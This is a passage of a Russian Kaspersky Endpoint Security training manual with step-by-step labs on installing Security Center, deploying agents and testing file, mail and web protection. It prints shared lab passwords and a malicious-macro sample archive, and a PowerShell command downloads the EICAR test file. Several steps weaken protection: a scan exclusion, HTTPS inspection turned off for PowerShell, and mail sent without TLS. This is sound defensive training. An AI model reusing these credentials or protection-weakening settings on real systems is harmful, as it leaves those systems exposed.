KL 002.12 Ru Labs v1.8

KL 002.12: Kaspersky Endpoint Security and Management.
[Subject]
KL 002.12.1
Kaspersky Endpoint
Security and
Management
Лабораторные
работы
1
[Subject]
Содержание
Лабораторная работа 1. Установить Kaspersky Security Center ............................................................. 4
Задание A: Установите Сервер администрирования и Веб-консоль Kaspersky Security
Center ............................................................................................................................................... 4
Задание B: Пройдите мастер первоначальной настройки Сервера администрирования
Kaspersky Security Center .............................................................................................................14
Задание C: Настройте двухфакторную аутентификацию для входа в веб-консоль
Kaspersky Security Center .............................................................................................................23
Лабораторная работа 2. Внедрить Kaspersky Endpoint Security ...........................................................26
Задание A: Установите Kaspersky Endpoint Security для Windows на рабочую станцию и
сервер администрирования Kaspersky Security Center ............................................................26
Задание B: Создайте автономный пакет установки Kaspersky Endpoint Security .............34
Задание C: Установите автономный пакет Kaspersky Endpoint Security для Windows на
ноутбук .........................................................................................................................................35
Задание D: Изучите результаты развертывания защиты в сети .....................................36
Лабораторная работа 3. Создать структуру групп управляемых компьютеров ..................................37
Задание A: Создайте группы для рабочих станций, мобильных компьютеров и серверов
........................................................................................................................................................38
Задание B: Распределите компьютеры по группам с помощью правил ..............................40
Лабораторная работа 4. Настроить защиту от файловых угроз ...........................................................46
Задание A: Проверьте обнаружение тестового объекта ....................................................46
Задание B: Настройте исключения для защиты от файловых угроз .................................48
Лабораторная работа 5. Настроить защиту от почтовых угроз ............................................................49
Задание A: Отправьте письмо с исполняемым файлом ........................................................50
Задание B: Отредактируйте фильтр вложений ....................................................................51
Задание C: Проверьте, что Защита от почтовых угроз больше не редактирует
вложения .......................................................................................................................................53
Лабораторная работа 6. Проверить защиту от веб-угроз ......................................................................55
Задание A: Проверьте, что Защита от веб-угроз проверяет https трафик c настройками
по умолчанию ................................................................................................................................55
Задание B: Выключите проверку шифрованного трафика для программы PowerShell .....57
Задание C: Проверьте, что защита от веб-угроз не мешает загрузить тестовый файл
доверенной программе PowerShell по протоколу https ...........................................................59
Лабораторная работа 7. Проверить защиту сетевых папок от программ-вымогателей.....................59
Задание A: Имитируйте заражение вредоносной программой-вымогателем....................60
Задание B: Проверьте результаты работы компонента Анализ Поведения ....................63
Задание C: Разрешите шифрование в сетевых папках общего доступа и настройте
исключения для доверенных сетевых устройств ...................................................................64
Задание D: Проверьте, что исключения для доверенных сетевых устройств работают
корректно .....................................................................................................................................65
Лабораторная работа 8. Проверить Защиту от бесфайловых угроз ....................................................66
Задание A: Проверьте обнаружение бесфайловой угрозы при помощи интерфейса против
вредоносного сканирования AMSI. .............................................................................................67
Лабораторная работа 9. Проверить Защиту от эксплойтов ..................................................................68
Задание A: Имитируйте хакерскую атаку и получите доступ к удаленному компьютеру
........................................................................................................................................................69
1
Задание B: Отключите часть компонентов защиты ............................................................73

Задание C: Проверьте защиту от эксплоитов ......................................................................75
Лабораторная работа 10. Настроить Предотвращение вторжений для защиты от программ-
вымогателей ..............................................................................................................................................77
Задание A: Имитируйте заражение вредоносной программой-вымогателем....................77
Задание B: Запретите изменять и удалять документы всем программам, кроме
доверенных ...................................................................................................................................78
Задание C: Настройте хранить события компонента предотвращение вторжений на
Сервере администрирования .....................................................................................................83
Задание D: Имитируйте шифрование документа и оцените результат ..........................85
Лабораторная работа 11. Проверить Защиту от сетевых атак .............................................................87
Задание A: Включите защиту от атак типа MAC Spoofing .................................................88
Задание B: Имитируйте атаку по сети с компьютера Kali на компьютер Alex-Desktop .90
Задание C: Изучите отчет о сетевых атаках .......................................................................91
Задание D: Завершите атаку ....................................................................................................96
Лабораторная работа 12. Настроить Контроль программ .....................................................................97
Задание A: Создайте категорию для всех веб-браузеров кроме Google Chrome ...............98
Задание B: Запретите пользователям запускать веб-браузеры, кроме Google Chrome101
Задание C: Запустите Mozilla Firefox и Google Chrome ........................................................104
Лабораторная работа 13. Заблокировать запуск неизвестных файлов в сети .................................105
Задание A: Создайте категорию программ, запрещающую запуск неизвестных файлов
......................................................................................................................................................106
Задание B: Внесите изменения в политику, запретив всем пользователям запуск
неизвестных файлов .................................................................................................................111
Задание C: Проверьте работу правил Контроля программ ...............................................114
Лабораторная работа 14. Настроить контроль доступа к веб-ресурсам ...........................................116
Задание A: Создайте правило блокировки доступа к биржам криптовалют ...................116
Задание B: Проверьте работоспособность блокировки доступа к биржам криптовалют
......................................................................................................................................................120
Задание C: Проверьте события Kaspersky Security Center ..................................................121
Лабораторная работа 15. Настроить Адаптивный Контроль Аномалий ............................................122
Задание A: Настройте блокировку запуска макросов и скриптов в офисных документах
......................................................................................................................................................123
Задание B: Проверьте, что Адаптивный Контроль Аномалий блокирует запуск
вредоносного макроса ...............................................................................................................125
Лабораторная работа 16. Имитировать атаку на сеть предприятия ..................................................127
Задание A: Имитируйте действия злоумышленника по атаке на лабораторный полигон
......................................................................................................................................................128
Задание B: Ознакомьтесь с результатами атаки ...............................................................129
Лабораторная работа 17. Развернуть Kaspersky Endpoint Detection and Response .........................130
Задание A: Установите компонент Endpoint Detection and Response Optimum ................130
Задание B: Активируйте Kaspersky EDR Optimum ................................................................133
Задание C: Проверьте, что компонент Endpoint Detection and Response Optimum
активирован ...............................................................................................................................134
Лабораторная работа 18. Подготовить Kaspersky EDR к работе .......................................................135
Задание A: Добавьте виджет и включите отображение узла Alerts .................................136
Задание B: Включите компонент Endpoint Detection and Response Optimum ....................138
Задание C: Проверьте работоспособность компонента Endpoint Detection and Response
Optimum .......................................................................................................................................140
2
Лабораторная работа 19. Расследовать инцидент ..............................................................................142

Задание A: Проанализируйте общую информацию карточки обнаружения и включите
сетевую изоляцию для компьютера Admin-Laptop................................................................143
Задание B: Изучите файлы, созданные в результате запуска вредоносного файла ......148
Задание C: Исследуйте файл droppedfile1 ..............................................................................152
Задание D: Проанализируйте информацию о сетевых соединениях .................................154
Задание E: Проанализируйте изменения в реестре .............................................................157
Задание F: Создайте правило блокирования .........................................................................158
Задание G: Создайте задачу поиска индикаторов компрометации ...................................161
Задание H: Снимите сетевую изоляцию с компьютера ......................................................167
Лабораторная работа 20. Настроить защиту паролем ........................................................................168
Задание A: Найдите компьютер с выключенной защитой ..................................................169
Задание B: Установите пароль на Kaspersky Endpoint Security ...........................................171
Задание C: Установите пароль на удаление Агента администрирования ......................178
Лабораторная работа 21. Настроить панель мониторинга .................................................................180
Задание A: Добавьте новые виджеты в панель мониторинга ............................................181
Задание B: Удалите и переместите виджет ........................................................................185
Лабораторная работа 22. Настроить отчеты ........................................................................................187
Задание A: Удалите отчеты, которые не используете .....................................................188
Задание B: Создайте отчет о зараженных компьютерах за неделю ................................190
Задание C: Настройте сервер администрирования отправлять по почте самые важные
отчеты .......................................................................................................................................192
Лабораторная работа 23. Собрать диагностическую информацию ...................................................195
3
[Subject]
Лабораторная работа 1.
Установить Kaspersky Security Center
Сценарий. Вам нужно защитить менее 100 компьютеров компании ABC с помощью Kaspersky Endpoint
Security для бизнеса. Чтобы управлять защитой в такой сети, хватит одного Сервера администрирования и
сервера базы данных PostgreSQL. Установите Сервер администрирования Kaspersky Security Center на
выделенный компьютер под управлением Windows Server 2019. PostgreSQL заблаговременно установлен
на виртуальной машине.
Содержание. В этой лабораторной работе:
1. Установите Сервер администрирования и Веб-консоль Kaspersky Security Center

2. Пройдите мастер первоначальной настройки Сервера администрирования Kaspersky Security Center
3. Настройте двухэтапную проверку для входа в веб-консоль Kaspersky Security Center
Задание A: Установите Сервер администрирования и Веб-консоль Kaspersky

Security Center
Выполните выборочную установку Сервера администрирования Kaspersky Security Center с настройками по
умолчанию. Веб-консоль представляет собой отдельный компонент и имеет собственный дистрибутив; ее
установка начинается автоматически после установки Kaspersky Security Center Administration Server.
Компьютеры KSC, DC должны быть включены.
Задание выполняется на компьютере KSC.
1. Войдите в систему от имени

пользователя
.\Administrator с паролем
Ka5per$Ky
Мы используем учетную запись

локального администратора,
чтобы не дать никому
возможности получить доступ к
базе данных Сервера
администрирования из под
учетных записей домена
2. Запустите программу
установки Kaspersky Security
Center (файл находится на
рабочем столе)
4
KL 002.12: Kaspersky Endpoint Security and Management. Лабораторная работа 1.
3. Нажмите Install Kaspersky

Security Center 14.2
4. В окне приветствия нажмите

Next
5. В следующем окне
убедитесь, что требуемая
версия .NET Framework
установлена и нажмите Next
5
6. Примите условия
лицензионного соглашения
и политику
конфиденциальности
7. Нажмите Next
6
9. Выберите тип установки

Standart и нажмите Next
10. Выберите тип установки

Install both Administration
Consoles и нажмите Next
7
11. Оставьте размер сети Fewer

than 100 networked devices
и нажмите Next
12. Выберите PostgreSQL or

Postgres Pro и нажмите
Next
8
14. Введите дважды пароль для

подключения к базе данных
PostrgeSQL: Ka5per$Ky
16. Начните установку: нажмите

Install
9
17. После установки KSC

Administration Server
автоматически запустится
установщик KSC Web
Console. Выберите язык
мастера установки
18. В окне приветствия нажмите

Next
19. Примите условия

лицензионного соглашения
и нажмите Next
20. Оставьте папку назначения

без изменений
10
22. Укажите Адрес

подключения: 127.0.0.1
23. Оставьте порт без
изменения
24. Нажмите Test
25. Убедитесь, что порт 8080

доступен по адресу 127.0.0.1
26. Нажмите OK
28. Оставьте настройки без

изменений
30. Выберите параметр

Generate new certificate
11
32. Убедитесь, что в списке

доверенных Серверов
администрирования указан
KSC
33. Для продолжения установки
нажмите Next
34. Пропустите этот шаг и

нажмите Next
35. Начните установку: нажмите

Install
12
36. Закройте мастер установки

веб-консоли Kaspersky
Security Center. Нажмите
Finish
37. Выключите автоматический

запуск веб-консоли после
завершения мастера
установки
38. Закройте мастер Kaspersky
Security Center Administration
Server. Нажмите Finish
13
Задание B: Пройдите мастер первоначальной настройки Сервера

администрирования Kaspersky Security Center
Выполните предварительную настройку на стороне сервера администрирования, чтобы все было готово к
развертыванию Kaspersky Endpoint Security и Агента администрирования в сети предприятия. Для этого
пройдите мастер первоначальной настройки: создайте задачи и политики по умолчанию, примите
соглашения с KSN, настройте отправку уведомлений администратору и включите автоматическое
распространение ключа на управляемые устройства.
Задание выполняется на компьютере Admin-Laptop.
39. Войдите в систему от

имени пользователя
ABC\Admin с
паролем Ka5per$Ky
40. Откройте веб-браузер
Google Chrome. В
адресной строке
введите:
https://ksc:8080
41. Нажмите Advanced
42. Пройдите по ссылке
Proceed to ksc
(unsafe)
14
43. Введите имя пользователя Administrator

и пароль Ka5per$Ky
44. Нажмите кнопку Sign in
При первом подключении, веб-консоль

предлагает ознакомиться с руководством
усиления защиты. Часть мер мы реализуем в
рамках лабораторных работ. С полным
перечнем рекомендаций вы можете
ознакомиться в онлайн-справке.
45. Внимательно прочитайте руководство по

усилению защиты, подтвердите, что вы
ознакомились с ним и нажмите Accept
15
Также, при первом

подключении, веб-
консоль предлагает
пройти мастер
первоначальной
настройки. Вы можете
запустить мастер в любой
момент из меню
Discovery & Deployment |
Deployment & Assignment |
Quick Start Wizard
46. В окне приветствия

мастера нажмите
Start
47. Использование Proxy

сервера не требуется.
Нажмите Next
16
49. Отметьте
Workstations и
Windows
51. Выберите Lite

encryption (AES56)
53. Выберите
Workstations Web
plug-in Kaspersky
Endpoint Security
17
55. Дождитесь окончания

установки веб-
плагинов и нажмите
Next
56. Выберите пакет

Kaspersky Endpoint
Security for Windows
с упрощенным
шифрованием
58. Примите
пользовательское
соглашение KSN
18
60. Выберите Enter

activation code
61. Введите код
Расположение файла с
кодом активации уточните
у преподавателя
62. Нажмите Send
Automatically
distribute license key
to managed devices
19
66. Нажмите Create и

дождитесь пока
Мастер создаст
политики и задачи
68. Введите
administartor@abc.lab
в поле Email
addresses of
recipients
69. Введите в поле SMTP
server address
dc.abc.lab
70. Введите в поле SMTP
server port 25
71. В разделе Transport
Layers Security в
выпадающем меню
выберите Do not use
TLS
20
74. Снимите флажок Run

Protection
Deployment Wizard
75. Нажмите Finish
76. В боковом меню выберите Devices | Polices & Profiles

77. Нажмите на политику Kaspersky Security Center Network Agent
78. Перейдите на вкладку Application Settings в раздел Connectivity

79. Откройте настройки секции Network
21
80. Измените параметр Synchronization interval (min) на 3
Интервал синхронизации меняется только для удобства выполнения лабораторных работ. В

производственной среде мы не рекомендуем его уменьшать
82. Нажмите Save
22
Задание C: Настройте двухфакторную аутентификацию для входа в веб-консоль

Kaspersky Security Center
Для усиления защиты сервера администрирования, настройте двухэтапную проверку. В качестве второго
этапа проверки используйте Google Authenticator.
Google Authenticator предварительно установите на любое мобильное устройство, которое может

подключиться к интернету.
83. Установите приложение Google Authenticator на Ваше мобильное устройство
84. Перейдите в раздел Users & roles | Users

85. В поле поиска введите KSC\Administrator
Будьте аккуратны – имя пользователя чувствительно к регистру
86. В списке пользователей отобразится учетная запись KSC\Administrator. Нажмите на нее
87. Перейдите на вкладку

Authentication
security
88. Включите опцию
Request user name,
password, and
security code (two-
step verification) в
секции Authentication
of this account on the
Administrator Server
89. Нажмите Generate a
new secret key
23
90. Раскройте список

View how to set up
two-step verification
91. Нажмите View QR
code
92. Отсканируйте QR-код в приложении Google

Authenticator
24
94. Введите полученный

в приложении Google
Authenticator код
95. Нажмите Check and
apply
97. Закройте окна Two-
step verification и
свойства
пользователя
KSC\Administrator
98. Нажмите KSC\Administrator в левом нижнем углу

99. Нажмите Sign out
100. Войдите в веб-консоль с логином Administrator и

101. Убедитесь, что веб-консоль запрашивает второй фактор
– код из Google Authenticator
Заключение
Вы установили Kaspersky Security Center, веб-консоль Kaspersky Security Center и добавили плагин для
управления Kaspersky Endpoint Security. Выполнили мастер первоначальной настройки: создали задачи и
политики по умолчанию, приняли соглашения с KSN, настроили отправку уведомлений администратору и
включили авто распространение ключа. Настроили двухэтапную проверку для усиления защиты сервера
администрирования Kaspersky Security Center.
Как устанавливать Kaspersky Endpoint Security и Агент администрирования, рассказывают следующие

лабораторные работы.
25
Внедрить Kaspersky Endpoint Security
Сценарий. Вам нужно установить Kaspersky Endpoint Security на компьютеры сети. Вы уже установили
Сервер администрирования Kaspersky Security Center. Теперь установите Kaspersky Endpoint Security и
Агент администрирования на компьютеры, которые обнаружил Сервер администрирования, удаленно или с
помощью автономного пакета установки.
1. Установите Kaspersky Endpoint Security для Windows на рабочую станцию и серверы

2. Создайте автономный пакет установки Kaspersky Endpoint Security
3. Установите автономный пакет Kaspersky Endpoint Security для Windows на ноутбук
4. Изучите результаты развертывания защиты в сети
26
Задание A: Установите Kaspersky Endpoint Security для Windows на рабочую

станцию и серверы
Выберите пакет Kaspersky Endpoint Security и запустите установку с помощью задачи удаленной установки
на всех компьютерах в сети, кроме ноутбука. Для доступа к компьютерам укажите учетную запись
администратора домена ABC\Administrator с паролем Ka5per$Ky. Остальные настройки оставьте по
умолчанию.
Подождите, пока задача установит программы. Если задача попросит перезагрузить компьютеры,
перезагрузите их от имени пользователя.
На компьютере Alex-Desktop установлен сторонний антивирус ClamWin, что теоретически может осложнить
установку. Однако вы сможете убедиться, что деинсталляция стороннего антивируса выполняется
автоматически в ходе установки Kaspersky Endpoint Security для Windows.
Компьютеры KSC, DC, Alex-Desktop и Admin-Laptop должны быть включены.
1. Войдите в систему от имени пользователя ABC\Admin с паролем Ka5per$Ky

2. Откройте веб-консоль Kaspersky Security Center в браузере Google Chrome
3. Пройдите на страницу Operations | Repositories | Installation Packages
4. Перейдите на вкладку In progress
5. Нажмите на ссылку Kaspersky Endpoint Security for Windows
27
6. Дождитесь
появления кнопки
Show EULA и
нажмите ее
7. Примите условия пользовательского соглашения и нажмите Accept

8. Дождитесь завершения загрузки
9. Нажмите Close
28
10. Перейдите на вкладку Downloaded

11. Выберите Kaspersky Endpoint Security для Windows из списка установочных пакетов
12. Нажмите Deploy
13. Выберите Using the remote installation task

15. Отметьте инсталляционный пакет Kaspersky Security Center Network Agent

29
17. Выберите опцию Select devices for installation

18. Разверните список Managed devices. Найдите и
отметьте компьютер KSC
19. Разверните список Unassigned devices. Найдите и
отметьте компьютеры Alex-Desktop и DC
21. Не меняйте параметры установки и нажмите Next
30
22. Не меняйте параметры перезагрузки, нажмите Next
23. Согласитесь удалять несовместимые программы и нажмите Next
24. Выберите опцию Move unassigned devices to group, отметьте Managed devices и нажмите Next
31
25. Выберите Account required (Network Agent is not used)

26. Нажмите Add
27. Введите логин abc\administrator, пароль

Ka5per$Ky и нажмите OK
29. Отметьте опцию Run the task after the Wizard finishes
31. В боковом меню выберите Devices | Tasks

32. Нажмите на задачу удаленной установки Kaspersky Endpoint Security для Windows: Remote
installation task
32
33. Убедитесь, что задача выполняется на трех компьютерах
34. Дождитесь изменения статуса задачи на Running/100%

35. Проверьте результаты на вкладке Results
36. Перезагрузите компьютеры, которые требуют перезагрузки
33
Задание B: Создайте автономный пакет установки Kaspersky Endpoint Security

Откройте список пакетов установки. Выберите пакет Kaspersky Endpoint Security. Запустите мастер
создания автономного пакета. Добавьте к установке Агент администрирования и выберите группу, в
которую попадут компьютеры с Агентом.
37. Перейдите в узел Operations | Repositories | Installation Packages

38. Выберите инсталляционный пакет Kaspersky Endpoint Security for Windows
39. Кликните по кнопке Deploy
40. Выберите Using a stand-

alone package
42. Отметьте Install Network

Agent together with this
application
34
44. Настройте перемещение в

группу: Выберите Move
unassigned devices to this
group
45. Нажмите Select group
46. Отметьте Managed devices

49. В открывшейся странице отображается путь к установочному файлу

50. Закройте мастер: нажмите Finish
Задание C: Установите автономный пакет Kaspersky Endpoint Security для Windows

на ноутбук
С клиентского компьютера откройте общую папку KLSHARE на Сервере администрирования. Найдите и
запустите автономный пакет.
51. Запустите Windows Explorer

52. Откройте сетевую папку
\\KSC\klshare\PkgInst\Kaspersky Endpoint
53. Скопируйте файл installer.exe на
компьютер
35
54. Запустите installer.exe

55. Начните установку: нажмите Start
installation
56. Подождите, пока установка закончится,

и закройте окно с результатами:
нажмите Ok
Задание D: Изучите результаты развертывания защиты в сети

Изучите результаты задачи установки. Проверьте, что компьютеры попали в группу Managed Devices.
Проверьте, что на компьютерах установлены Агент администрирования и Kaspersky Endpoint Security.
57. Откройте веб-консоль Kaspersky Security Center

58. В боковом меню выберите Monitoring & Reporting | Reports
59. Нажмите Report on Kaspersky software versions
36
Создать структуру групп управляемых компьютеров
60. Проверьте, что в сети есть четыре экземпляра Kaspersky Endpoint Security и четыре экземпляра
Агента администрирования — столько же, сколько и компьютеров
61. Закройте отчет
Вы установили Kaspersky Endpoint Security и Агент администрирования с помощью задачи удаленной

установки и с помощью автономного пакета.
Если на компьютерах есть сторонние антивирусы, инсталлятор удаляет их и просит перезагрузить

компьютер.
Если на компьютерах запущен сетевой экран или вы не добавили в задачу учетную запись с правами
администратора на компьютере, установка закончится с ошибкой.
Сценарий. Вы установили защиту на компьютеры сети и хотите настроить ее оптимальным образом. Вы
предполагаете, что настройки защиты для серверов, настольных и мобильных компьютеров будут
отличаться. Чтобы использовать различные настройки для разных узлов, создайте группы и поместите туда
соответствующие компьютеры. Чтобы не перемещать компьютеры в группы вручную, создайте правила
перемещения и настройте в них условия на основе операционных систем и сетевых параметров
компьютеров.
1. Создайте группы рабочих станций, мобильных компьютеров и серверов

2. Распределите компьютеры по группам с помощью правил
37
Задание A: Создайте группы для рабочих станций, мобильных компьютеров и

серверов
Создайте подгруппы Servers и Workstations в контейнере Managed Devices. Затем создайте подгруппы
Desktops и Laptops в группе Workstations.
1. Войдите в систему от имени

пользователя ABC\Admin с
2. Откройте веб-консоль
Kaspersky Security Center в
браузере Google Chrome
3. В боковом меню выберите
Devices | Hierarchy of
groups
4. Выберите группу: Managed
devices
5. Добавьте подгруппу
компьютеров: нажмите Add
6. Введите имя Servers и

нажмите Add
38
7. Добавьте еще одну

подгруппу, назовите ее
Workstations
8. Выберите группу
Workstations и нажмите
Add
9. Введите название группы

Desktops и нажмите Add
10. Аналогично создайте
подгруппу Workstations |
Laptops
Мы рекомендуем выделить
сервер KSC в отдельную
группу. Это позволит
использовать индивидуальную
политику безопасности для
сервера администрирования.
Так вы сможете задать
максимально подходящие
параметры безопасности для
сервера администрирования. В
рамках лабораторных работ
для упрощения мы будем
использовать общую политику.
39
Задание B: Распределите компьютеры по группам с помощью правил

Откройте список правил перемещения устройств. Создайте правило, которое работает постоянно и
перемещает компьютеры в группу Servers. Правило должно перемещать компьютеры с установленным
Агентом администрирования и операционной системой Windows Server 2019. Эти условия настраиваются
на вкладке Applications.
Создайте аналогичные правила, которые перемещают компьютеры в группы Desktops и Laptops. Правило
должно перемещать компьютеры на основе их IP-адреса. Для этого настройте условие IP Range на вкладке
Network. Для настольных компьютеров укажите диапазон 10.28.0.200–10.28.0.254, а для ноутбуков
10.28.0.100–10.28.0.199.
11. Перейдите на страницу Discovery & Deployment | Deployment & Assignment | Moving Rules
13. Введите имя правила Servers

14. Укажите группу назначения: В выпадающем списке выберите подгруппу Managed devices | Servers
15. Выберите режим Apply rule continuously
16. Примените правило ко всем компьютерам: снимите отметку с параметра Move only devices that do
not belong to an administration group
17. Включите правило: поставьте отметку возле опции Enable rule
40
18. Откройте Rule conditions

19. Перейдите на вкладку Applications
20. Из выпадающего списка Network Agents is installed выберите опцию, что Сетевой Агент установлен:
Yes
21. Примените правило к компьютерам с серверными операционными системами: включите параметр
Operating system version
22. Прокрутите список до конца и перейдите на вторую страницу
23. Отметьте операционную систему Microsoft Windows Server 2019
24. Сохраните правило: нажмите Save
25. Создайте правило для настольных компьютеров: нажмите Add
41
26. Введите имя правила Desktops

27. Укажите группу назначения: В выпадающем списке выберите подгруппу Managed devices |
Workstations | Desktops
29. Примените правило ко всем компьютерам: снимите отметку с параметра Move only devices that do
not belong to an administration group
30. Включите правило: поставьте отметку возле опции Enable rule
31. Перейдите на вкладку Rule conditions

32. Настройте условия для IP-адресов: перейдите на вкладку Network
33. Примените правило к компьютерам с адресами в заданном интервале: включите параметр IP range
34. Ведите начальный и конечный IP-адрес 10.28.0.200 и 10.28.0.254 соответственно
42

Yes
38. Создайте правило Laptops

39. Укажите группу назначения: В выпадающем списке выберите подгруппу Managed devices |
Workstations | Laptops
41. Снимите отметку с параметра Move only devices that do not belong to an administration group
42. Отметьте параметр Enable rule
43
43. Перейдите на вкладку Rule conditions

44. Перейдите на вкладку Network
45. Включите параметр IP range
46. Ведите начальный и конечный IP-адрес 10.28.0.100 и 10.28.0.199 соответственно
47. Перейдите в раздел Applications

Yes
50. В списке правил должно быть создано пять правил перемещения: два от инсталляционных пакетов,
три созданных вами
44
51. Перейдите на страницу Devices | Managed Devices

52. Наверху страницы нажмите на путь KSC / Managed Devices
53. В дереве групп выберите KSC | Managed Devices | Servers
54. Проверьте, что компьютеры KSC и DC с операционной системой Windows Server 2019 были
автоматически перемещены в группу Servers
55. Самостоятельно проверьте, что остальные компьютеры переместились в соответствующие группы
Вы установили защиту и распределили компьютеры в группы.
Настройки по умолчанию рассчитаны на среднего пользователя Kaspersky Endpoint Security. Они надежно
защищают компьютеры, но стараются как можно меньше влиять на работу пользователя. Вы можете
изменить баланс между защитой и комфортом пользователей: усилить защиту в одних аспектах и, может
быть, незначительно ослабить в других, увеличив комфорт.
Как менять настройки защиты рассказывают дальнейшие лабораторные работы.
45
Настроить защиту от файловых угроз
Сценарий. Вы установили и активировали Kaspersky Endpoint Security на компьютерах сети с настройками
по умолчанию и теперь хотите проверить, что защита от файловых угроз работает в базовых сценариях.
1. Проверьте обнаружение тестового объекта

2. Настройте исключения для защиты от файловых угроз
Задание A: Проверьте обнаружение тестового объекта

Распакуйте zip-архив с тестовым вредоносным файлом. Проверьте, что защита от файловых угроз
перехватила и удалила тестовый объект.
Задание выполняется на компьютере Alex-Desktop.
1. Войдите в систему с
логином ABC/Alex и
2. Перейдите в папку
C:\Reports и
распакуйте архив
Report with
converting
macros.zip
Пароль архива:
infected
3. Откройте папку с
распакованными
файлами и запустите
файл
Файл открывается с
ошибкой, т.к. Kaspersky
Endpoint Security
определяет встроенный в
документ макрос как
вредоносный
46
4. Откройте программу
Kaspersky Endpoint
5. Перейдите в раздел
Reports
6. В разделе File Threat Protection убедитесь, что Kaspersky Endpoint Security for Windows обнаружил
вредоносный файл
47
Задание B: Настройте исключения для защиты от файловых угроз

Kaspersky Endpoint Security посчитал вредоносным файл с макросом, который мы используем в работе.
Создайте исключение для компонента защиты от файловых угроз. Убедитесь, что настроенное исключение
работает на примере тестового объекта из предыдущего задания.
7. Перейдите в веб-консоль Kaspersky Security Center

8. В боковом меню выберите Devices | Policies & profiles
9. Убедитесь, что в строке Current path указан путь KSC
10. Откройте свойства политики Kaspersky Endpoint Security for Windows
11. Откройте Exclusions and types of detected objects в разделе General settings на вкладке
Application settings
48
Настроить защиту от почтовых угроз
12. Нажмите
Scan
exclusions
14. Включите
опцию File or
folder
15. Введите путь:
C:\Reports\*
трижды и
сохраните
изменения в
политике
Переключитесь на компьютер Alex-Desktop.
17. Распакуйте архив еще раз, запустите файл и убедитесь, что на этот раз Kaspersky Endpoint Security
for Windows не обнаружил никаких угроз
Эта лабораторная работа показывает, как Kaspersky Endpoint Security умеет обнаруживать вредоносные
файлы при помощи локальных баз, а также как настроить исключение для случаев ложного срабатывания.
Сценарий. Когда вы посылаете по почте исполняемый файл, чтобы пользователь его запустил и решил
свою проблему, Kaspersky Endpoint Security по умолчанию переименовывает вложение. Чтобы не
объяснять пользователям как переименовать его назад и не терять время, настройте защиту от почтовых
49
угроз не переименовывать файлы. Однако злоумышленники часто используют файлы с двойным

расширением, чтобы обманным путем заставить пользователя запустить исполняемый файл под видом
документа. Такие файлы нужно удалять.
1. Отправьте письмо с исполняемым файлом

2. Отредактируйте фильтр вложений
3. Проверьте, что защита от Почтовых угроз больше не редактирует вложения
Задание A: Отправьте письмо с исполняемым файлом

Отправьте тестовое письмо на почтовый адрес администратора - administrator@abc.lab. К письму
приложите *.pdf.exe-файл в zip-архиве. Получите письмо и проверьте, что защита от почтовых угроз
изменила расширение файла.
Начните выполнять задание на компьютере Alex-Desktop.
1. Войдите в систему с логином

ABC\Alex и паролем
Ka5per$Ky
2. Запустите Thunderbird (ярлык
в меню Пуск)
3. Создайте новое письмо –
нажмите Write:
— Укажите адресата. В поле
To: введите
administrator@abc.lab
— Задайте тему. В поле
Subject: введите Weekly
report
— Приложите к письму файл
Document1.zip (файл
находится в папке
Documents)
4. Отправьте письмо: нажмите
Send
50
Перейдите на компьютер Admin-Laptop.
логином ABC\Admin и
6. Откройте Thunderbird.
Выберите полученное
письмо
7. Сохраните файл
Document1.zip на рабочий
стол
8. Распакуйте архив
Document1.zip
9. Обратите внимание, что
заархивированный файл
называется
Document1.pdf.ex_.
Защита от почтовых угроз

изменила расширение архива
с исполняемым файлом
51
Задание B: Отредактируйте фильтр вложений

В политике Kaspersky Endpoint Security отредактируйте список форматов вложений, которые обрабатывает
Защита от почтовых угроз.
Настройте компонент удалять вложения из списка. Отключите обработку исполняемых файлов, но

добавьте в список файлы с двойным расширением.

12. Откройте политику Kaspersky Endpoint Security for Windows
13. Перейдите на вкладку Application settings

14. Перейдите в раздел Essential Threat Protection
15. Откройте настройки Mail Threat Protection
52
16. Измените работу фильтра вложений. Выберите параметр: Delete attachments of selected types
17. Прокрутите список настроек вниз

18. Отключите обработку *.exe
19. Создайте новый фильтр вложений: Нажмите Add

20. В поле Extension добавьте *.pdf.exe
21. Нажмите OK дважды
22. Сохраните политику
Теперь Kaspersky Endpoint Security будет удалять из

электронных писем приложения с расширением *.pdf.exe
и не будет удалять файлы с расширением *.exe
53
Задание C: Проверьте, что Защита от почтовых угроз больше не редактирует

вложения
Проверьте работоспособность настроек, выполненных в предыдущем задании.
23. Подключитесь к машине

Alex-Desktop и создайте
еще одно письмо.
Приложите файл
Procmon.zip (файл
находится в папке
Documents)
24. В поле To: введите
25. В поле Subject: введите IT
Service Desk
26. Нажмите Send
Перейдите на компьютер Admin-Laptop.
27. Откройте Thunderbird

28. Сохраните файл Procmon.zip на рабочий стол
29. Распакуйте архив Procmon.zip
Обратите внимание, что в новом письме

заархивированный файл называется Procmon.exe;
Защита от почтовых угроз его не переименовала
Вы настроили защиту от почтовых угроз не переименовывать *.exe-файлы.
54
Проверить защиту от веб-угроз
Вашу сеть может атаковать новый вирус, который еще не попал в базу сигнатур и в KSN. Для максимальной
безопасности имеет смысл настроить защиту от почтовых угроз переименовывать или удалять все
исполняемые вложения. Но такая настройка снизит комфорт пользователей.
Сценарий. С настройками по умолчанию Kaspersky Endpoint Security умеет проверять зашифрованный
трафик, используя подмену сертификата. В некоторых случаях подмена сертификата может негативно
влиять на работу банк-клиентов и других программ, использующих свой собственный сертификат. Чтобы
избежать проблем взаимодействия в Kaspersky Endpoint Security есть возможность исключать из проверки
только зашифрованный трафик.
1. Проверьте, что Защита от веб-угроз проверяет https трафик c настройками по умолчанию

2. Выключите проверку шифрованного трафика для программы PowerShell
3. Проверьте, что защита от веб-угроз не мешает загрузить тестовый файл доверенной программе
PowerShell по протоколу https
Задание A: Проверьте, что Защита от веб-угроз проверяет https трафик c

настройками по умолчанию
Запустите PowerShell и попробуйте загрузить файл eicar_com.zip и посмотрите на реакцию Kaspersky
Endpoint Security.
Компьютеры DC, KSC, Admin-Laptop должны быть включены.

ABC\Administrator и паролем Ka5per$Ky
2. Нажмите Win+R
3. В поле ввода введите powershell
4. Нажмите кнопку OK
55
5. Загрузите файл eicar_com.zip средствами PowerShell по протоколу https. Выполните команду:

Invoke-WebRequest –uri “https://secure.eicar.org/eicar_com.zip” -OutFile
“C:\temp\eicar_com.zip”
6. Не закрывайте окно Powershell
7. Откройте Kaspersky Endpoint Security for Windows

8. Перейдите в Reports
9. Перейдите в раздел Web Threat Protection
10. Убедитесь, что Kaspersky Endpoint Security for Windows заблокировал загрузку вредоносного
файла
56
Задание B: Выключите проверку шифрованного трафика для программы

PowerShell
Добавьте программу PowerShell в список доверенных программ, попробуйте загрузить файл eicar_com.zip и
посмотрите на реакцию Kaspersky Endpoint Security.

